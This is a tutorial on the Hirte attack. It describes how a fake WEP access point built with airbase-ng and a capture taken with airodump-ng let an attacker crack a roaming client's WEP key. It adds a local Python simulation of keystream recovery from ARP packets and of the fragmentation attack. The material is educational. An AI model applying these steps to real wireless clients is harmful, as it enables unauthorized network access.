The only requirement for this attack is a fake access point that advertises the same SSID as the WEP network. When a client that has that network saved connects to it automatically, ARP packets are exchanged between the fake access point (the attacker's machine) and the client; because most of an ARP packet is known plaintext, each of those packets leaks part of the RC4 keystream used to encrypt it, and the attacker never needs the WEP key to run the fake access point.
Breakdown of the Hirte Attack
- Set up a fake WEP access point and wait for a client to connect
- Once a client has associated, wait for it to auto-configure an IP address (the fake access point runs no DHCP server, so the client falls back to a self-assigned link-local address)
- The client sends an ARP packet
- Capture that ARP packet and convert it into an ARP request addressed to the same client
- The client replies
- Collect the replies, each of which is encrypted under a fresh IV
- Crack the WEP key from the collected packets
Deployment of Hirte Attack
The first step is to create the WEP access point with airbase-ng, together with the SSID the client has saved. The -c option sets the channel, -W 1 sets the WEP (privacy) bit in the beacons so that the client believes it is talking to a WEP network, mon0 is the monitor-mode interface, and -N enables the Hirte attack mode.
The next step is to run airodump-ng on the same channel to capture the traffic and write it to a capture file named Hirte, which is later fed to the cracker.
Conclusion
As we saw with the Hirte attack, someone is able to crack the WEP key of a network just by exploiting a roaming client, without attacking the real access point at all. This is possible because the wireless profile, including the WEP key, is stored on the device and the client is configured to connect automatically to that network whenever it is seen in range. In summary, the attack relies on the following:
- It is a fragmentation attack
- It targets isolated clients, i.e. devices that are out of range of the real network but still carry its profile
- It collects ARP packets whose known plaintext leaks keystream, and the IVs accumulated from the client's replies are enough for the cracker to recover the WEP key
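To make the two properties above concrete (an ARP packet is known plaintext that leaks keystream, and the fragmentation attack turns a few keystream bytes into a packet of the attacker's choosing), here is an added, self-contained simulation in Python. It is not code from the original article or from aircrack-ng: RC4, WEP framing and ARP are implemented from scratch, the key, IV and addresses are made-up sample values, and it simplifies one step, namely the attacker is handed the client's link-local address directly, whereas airbase-ng derives the request from the client's own packet, which is not reimplemented here.

```python
import struct
import zlib

# Sample values, constructed for this example (not from the article).
WEP_KEY = bytes.fromhex("1f1f1f1f1f")          # 40-bit key; only the client side uses it
CLIENT_MAC = bytes.fromhex("0013ce1b2c3d")
ATTACKER_MAC = bytes.fromhex("00c0ca123456")
CLIENT_IP = bytes([169, 254, 17, 42])          # link-local address picked when no DHCP answers
ATTACKER_IP = bytes([169, 254, 1, 1])          # assumed: any address in the same range
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")
ARP_REQ_HDR = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)  # Ethernet, IPv4, hlen 6, plen 4, opcode 1


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key, length):
    """RC4 keystream of `length` bytes (KSA + PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: an unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """Frame body as it goes on the air: IV || key-id || RC4(IV||key) XOR (plaintext || ICV)."""
    return iv + b"\x00" + xor(plaintext + icv(plaintext), rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    if tag != icv(data):
        raise ValueError("bad ICV")
    return data


def arp(opcode, sha, spa, tha, tpa):
    return LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode) + sha + spa + tha + tpa


# Attacker side: no key needed.
def recover_keystream(frame, sender_mac):
    """LLC/SNAP, the ARP header and the sender MAC (also visible in the cleartext 802.11
    header) are fixed, so XOR with the ciphertext yields 22 keystream bytes for this IV."""
    known = LLC_SNAP_ARP + ARP_REQ_HDR + sender_mac
    return frame[:3], xor(frame[4:4 + len(known)], known)


def fragment_attack(iv, keystream, plaintext):
    """Fragmentation attack: any plaintext goes out as fragments of at most
    len(keystream)-4 bytes, each with its own ICV, all encrypted under the reused IV."""
    chunk = len(keystream) - 4
    frags = []
    for i in range(0, len(plaintext), chunk):
        part = plaintext[i:i + chunk]
        frags.append(iv + b"\x00" + xor(part + icv(part), keystream))
    return frags


# Client side: holds the real key and behaves like a normal WEP station.
def client_handle_fragments(frags, reply_iv):
    pkt = b"".join(wep_decrypt(WEP_KEY, f) for f in frags)  # raises on a bad ICV
    if pkt[:8] != LLC_SNAP_ARP:
        return None
    opcode = struct.unpack("!H", pkt[14:16])[0]
    sha, spa, tpa = pkt[16:22], pkt[22:26], pkt[32:36]
    if opcode != 1 or tpa != CLIENT_IP:
        return None
    return wep_encrypt(WEP_KEY, reply_iv, arp(2, CLIENT_MAC, CLIENT_IP, sha, spa))


def run_hirte_demo(rounds=50):
    """One Hirte exchange replayed `rounds` times. Returns (keystream check,
    fragment count, list of encrypted client replies, each under a different IV)."""
    # 1. The roaming client associates, gets no DHCP lease and sends a gratuitous ARP
    #    for its self-assigned address (the IV is a made-up sample value).
    client_frame = wep_encrypt(WEP_KEY, b"\x0c\x2b\x91",
                               arp(1, CLIENT_MAC, CLIENT_IP, bytes(6), CLIENT_IP))
    # 2. The attacker XORs the known plaintext out of it.
    iv, ks = recover_keystream(client_frame, CLIENT_MAC)
    keystream_ok = ks == rc4(iv + WEP_KEY, len(ks))  # checkable only because the demo holds both sides
    # 3. The attacker builds an ARP request for the client's IP and injects it in fragments.
    request = arp(1, ATTACKER_MAC, ATTACKER_IP, CLIENT_MAC, CLIENT_IP)
    frags = fragment_attack(iv, ks, request)
    # 4. Every replay makes the client answer under a fresh IV; those replies are the
    #    packets airodump-ng writes out for the cracker.
    collected = []
    for n in range(rounds):
        reply = client_handle_fragments(frags, struct.pack("<I", 0x100000 + n)[:3])
        if reply is not None:
            collected.append(reply)
    return keystream_ok, len(frags), collected


if __name__ == "__main__":
    ok, nfrags, replies = run_hirte_demo()
    print(f"keystream recovered: {ok}, fragments sent: {nfrags}, "
          f"replies with distinct IVs: {len({r[:3] for r in replies})}")
```

The 36-byte ARP request does not fit into the 22 keystream bytes the gratuitous ARP gives away, which is exactly why the attack needs fragmentation: two 18-byte fragments, each with its own ICV, are enough, and the client reassembles them without ever noticing that the IV was reused. Real WEP cracking needs tens of thousands of such replies; the simulation only shows that each replay yields one more packet under a new IV.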